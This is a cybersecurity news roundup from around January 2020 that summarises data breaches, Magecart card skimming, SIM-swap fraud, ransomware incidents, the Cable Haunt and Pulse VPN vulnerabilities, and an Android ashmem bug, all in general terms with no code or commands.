Table of Contents

  1. Leaks
    1. Go Games - 3,430,083 breached accounts
    2. Indian Railways - 583,377 breached accounts
    3. A billion medical images are exposed online, as doctors ignore warnings
  2. Crime
    1. SIM Swappers Are Using RDP To Directly Access Internal T-Mobile, AT&T, and Sprint Tools
    2. Beware of Amazon Prime Support Scams in Google Search Ads
    3. Two MageCart groups competed to steal credit cards data from Perricone MD ‘s European skincare sites
    4. Australia Bushfire Donors Affected by Credit Card Skimming Attack
  3. Vulnerabilities
    1. An Empirical Study of Wireless Carrier Authentication for SIM Swaps
    2. Hundreds of millions of cable modems are vulnerable to new Cable Haunt vulnerability
    3. US Govt Warns of Attacks on Unpatched Pulse VPN Servers
  4. Ransomware
    1. Maze Ransomware Publishes 14GB of Stolen Southwire Files
    2. Albany County Airport authority hit by a ransomware attack
    3. Ako Ransomware: Another Day, Another Infection Attacking Businesses
  5. Digital rights
    1. Indian Supreme Court Finds 150-Day Internet Blackout In Kashmir Illegal
  6. Google
    1. Over 50 Organizations Ask Google To Take a Stand Against Android Bloatware
    2. Google Chrome Will Support Windows 7 After End of Life
  7. Facebook
    1. A Facebook Bug Exposed Anonymous Admins of Pages
  8. Surveillance
    1. Police Surveillance Tools from Special Services Group
  9. Exploit development
    1. Exploit for ashmem android vulnerability

Leaks

Go Games - 3,430,083 breached accounts

In approximately October 2015, the manga website Go Games suffered a data breach. The exposed data included 3.4M customer records including email and IP addresses, usernames and passwords stored as salted MD5 hashes. Go Games did not respond when contacted about the incident. The data was provided to HIBP by dehashed.com.

Indian Railways - 583,377 breached accounts

In November 2019, the website for Indian Rail left more than 2M records exposed on an unprotected Firebase database instance. The exposed data included 583k unique email addresses alongside usernames and passwords stored in plain text.

A billion medical images are exposed online, as doctors ignore warnings

Insecure storage systems being used by hundreds of hospitals, medical offices and imaging centers are exposing over 1 billion medical images of patients across the world. "Yet despite warnings from security researchers who have spent weeks alerting hospitals and doctors' offices to the problem, many have ignored their warnings and continue to expose their patients' private health information," writes Zack Whittaker from TechCrunch. From the report: "It seems to get worse every day," said Dirk Schrader, who led the research at Germany-based security firm Greenbone Networks, which has been monitoring the number of exposed servers for the past year. The problem is well-documented. Greenbone found 24 million patient exams storing more than 720 million medical images in September, which first unearthed the scale of the problem as reported by ProPublica. Two months later, the number of exposed servers had increased by more than half, to 35 million patient exams, exposing 1.19 billion scans and representing a considerable violation of patient privacy.

Crime

SIM Swappers Are Using RDP To Directly Access Internal T-Mobile, AT&T, and Sprint Tools

Hackers are now getting telecom employees to run software that lets the hackers directly reach into the internal systems of U.S. telecom companies to take over customer cell phone numbers, Motherboard has learned. Multiple sources in and familiar with the SIM swapping community as well as screenshots shared with Motherboard suggest at least AT&T, T-Mobile, and Sprint have been impacted. The technique uses Remote Desktop Protocol (RDP) software. RDP lets a user control a computer over the internet rather than being physically in front of it. It's commonly used for legitimate purposes such as customer support. But scammers also make heavy use of RDP. In an age-old scam, a fraudster will phone an ordinary consumer and tell them their computer is infected with malware. To fix the issue, the victim needs to enable RDP and let the fake customer support representative into their machine. From here, the scammer could do all sorts of things, such as logging into online bank accounts and stealing funds.

Beware of Amazon Prime Support Scams in Google Search Ads

A malicious ad campaign is underway in Google Search results that lead users to fake Amazon support sites and tech support scams. A security researcher reached out to BleepingComputer today about search keywords such as "amazon prime" and "amazon prime customer support" that leads to ads pretending to be Amazon Prime support.

Two MageCart groups competed to steal credit cards data from Perricone MD ‘s European skincare sites

Two distinct MageCart groups have compromised multiple European websites for the Perricone MD anti-aging skin-care brand with the intent of stealing customer payment card info. The two groups planted software skimmers on Perricone MD websites in Italy, Germany, and the U.K., fortunately, at the time no credit card data seem to have been stolen. "During research into Magecart attacks, we recently uncovered malicious code from two hacking groups attempting to steal credit card information on the European e-commerce websites for the science-backed skincare brand Perricone MD (affecting perriconemd.co.uk, perriconemd.it and perriconemd.de)." reads the post from RapidSpike.

Australia Bushfire Donors Affected by Credit Card Skimming Attack

Attackers have compromised a website collecting donations for the victims of the Australia bushfires and injected a malicious script that steals the payment information of the donors. This type of attack is called Magecart and involves hackers compromising a web site and injecting malicious JavaScript into eCommerce or checkout pages. These scripts will then steal any credit cards or payment information that is submitted and send it off to a remote site under the attacker's control. The Malwarebytes Threat Intelligence Team has discovered a legitimate web site collecting donations for the tragic bushfires in Australia that has been compromised by a Magecart script.

Vulnerabilities

An Empirical Study of Wireless Carrier Authentication for SIM Swaps

Researchers have done a study of 140 websites that offer SMS-based authentication, and rated the vulnerability level of users of each website to a SIM swap attack.

Hundreds of millions of cable modems are vulnerable to new Cable Haunt vulnerability

A team of four Danish security researchers has disclosed this week a security flaw that impacts cable modems that use Broadcom chips. The vulnerability, codenamed Cable Haunt, is believed to impact an estimated 200 million cable modems in Europe alone, the research team said today. The vulnerability impacts a standard component of Broadcom chips called a spectrum analyzer. This is a hardware and software component that protects the cable modem from signal surges and disturbances coming via the coax cable. The component is often used by internet service providers (ISPs) in debugging connection quality. On most cable modems, access to this component is limited for connections from the internal network.

US Govt Warns of Attacks on Unpatched Pulse VPN Servers

The US Cybersecurity and Infrastructure Security Agency (CISA) today alerted organizations to patch their Pulse Secure VPN servers as a defense against ongoing attacks trying to exploit a known remote code execution (RCE) vulnerability. This warning follows another alert issued by CISA in October 2019, and others coming from the National Security Agency (NSA), the Canadian Centre for Cyber Security, and UK's National Cyber Security Center (NCSC). Pulse Secure reported the vulnerability tracked as CVE-2019-11510 and disclosed by Orange Tsai and Meh Chang from the DEVCORE research team, and by Jake Valletta from FireEye in an April 2019 out-of-cycle advisory.

Ransomware

Maze Ransomware Publishes 14GB of Stolen Southwire Files

The Maze Ransomware operator have released an additional 14GB of files that they claim were stolen from one of their victims for not paying a ransomware demand. In December the Maze Ransomware operators attacked Southwire, a wire and cable manufacturer out of Georgia, and allegedly stole 120GB worth of files before encrypting 878 devices on the network. Maze then demanded $6 million in bitcoins or they would publicly release Southwire's stolen files. When Southwire did not make a payment, the Maze operators uploaded some of the company's files to a "News" site that they had created to shame non-paying victims.

Albany County Airport authority hit by a ransomware attack

Officials at the Albany County Airport Authority announced this week that a ransomware attack hit the New York airport and its computer management provider LogicalNet over Christmas. The news of the attack was disclosed after LogicalNet reported its own management services network had been breached. According to the experts, the ransomware encrypted files on the authority's servers and its backup servers. Experts reported that the family of malware involved in the attack against LogicalNet was the Sodinokibi ransomware, the same malicious code that infected systems at the London-based Travelex currency exchange.

Ako Ransomware: Another Day, Another Infection Attacking Businesses

Like moths to a flame, new ransomware targeting businesses keep appearing every day as they are enticed by the prospects of million-dollar ransom payments. An example of this is a new ransomware called Ako that is targeting the entire network rather than just individual workstations. Ako was discovered yesterday when a victim posted in the BleepingComputer support forums about a new ransomware that had encrypted both their Windows 10 desktop and their Windows SBS 2011 server.

Digital rights

Indian Supreme Court Finds 150-Day Internet Blackout In Kashmir Illegal

Kashmir's status within India has been a topic of controversy for decades. But on Friday, India's highest court rejected the government's rationale, arguing that the blackout violated Indian telecommunications laws. "Freedom of Internet access is a fundamental right," justice N. V. Ramana said. "The Supreme Court ruling won't lead to an immediate restoration of Internet access in Kashmir, however," the report adds. "Instead, India's highest court has given the government a week to revise its policies. The court also required the government to be more transparent about its Internet shutdown orders."

Google

Over 50 Organizations Ask Google To Take a Stand Against Android Bloatware

In an open letter published yesterday, more than 50 organizations have asked Google to take action against Android smartphone vendors who ship devices with unremovable pre-installed apps, also known as bloatware. The letter, signed by 53 organizations, was addressed to Google CEO Sundar Pichai. Signees say Android bloatware has a detrimental effect on user privacy. They say many bloatware apps cannot be deleted and leave users exposed to having their data collected by unscrupulous phone vendors and app makers without their knowledge or consent. "These pre-installed apps can have privileged custom permissions that let them operate outside the Android security model," the open letter reads. Privacy International, the driving force behind this initiative, has also set up a petition page where normal users can add their voice to this campaign and put pressure on Google to intervene.

Google Chrome Will Support Windows 7 After End of Life

Google has officially stated that they will continue to supportthe Chrome browser in Windows 7 to give businesses more time to migrate to Windows 10. On January 14th, 2020, Windows 7 will reach End of Life, which means that unless you purchased Extended Security Updates licenses, Microsoft will no longer provide vulnerability or bug fixes for the operating system. For businesses, migrating to a new operating system can be a long and arduous task and while some may argue that organizations have had enough time to do so, many factors could come into play that delays this migration.

Facebook

A Facebook Bug Exposed Anonymous Admins of Pages

Facebook Pages give public figures, businesses, and other entities a presence on Facebook that isn't tied to an individual profile. The accounts behind those pages are anonymous unless a Page owner opts to make the admins public. You can't see, for example, the names of the people who post to Facebook on WIRED's behalf. All it took to exploit the bug was opening a target page and checking the edit history of a post. "People who run sensitive Pages from their own Facebook should now consider that their identity may be known," Olejnik says.

Surveillance

Police Surveillance Tools from Special Services Group

Special Services Group, a company that sells surveillance tools to the FBI, DEA, ICE, and other US government agencies, has had its secret sales brochure published. Motherboard received the brochure as part of a FOIA request to the Irvine Police Department in California.

Exploit development

Exploit for ashmem android vulnerability

Android suffers from ashmem read-only bypass vulnerabilities via remap~filepages~() and ASHMEM~UNPIN~. The vulnerability was patched in January security buletin.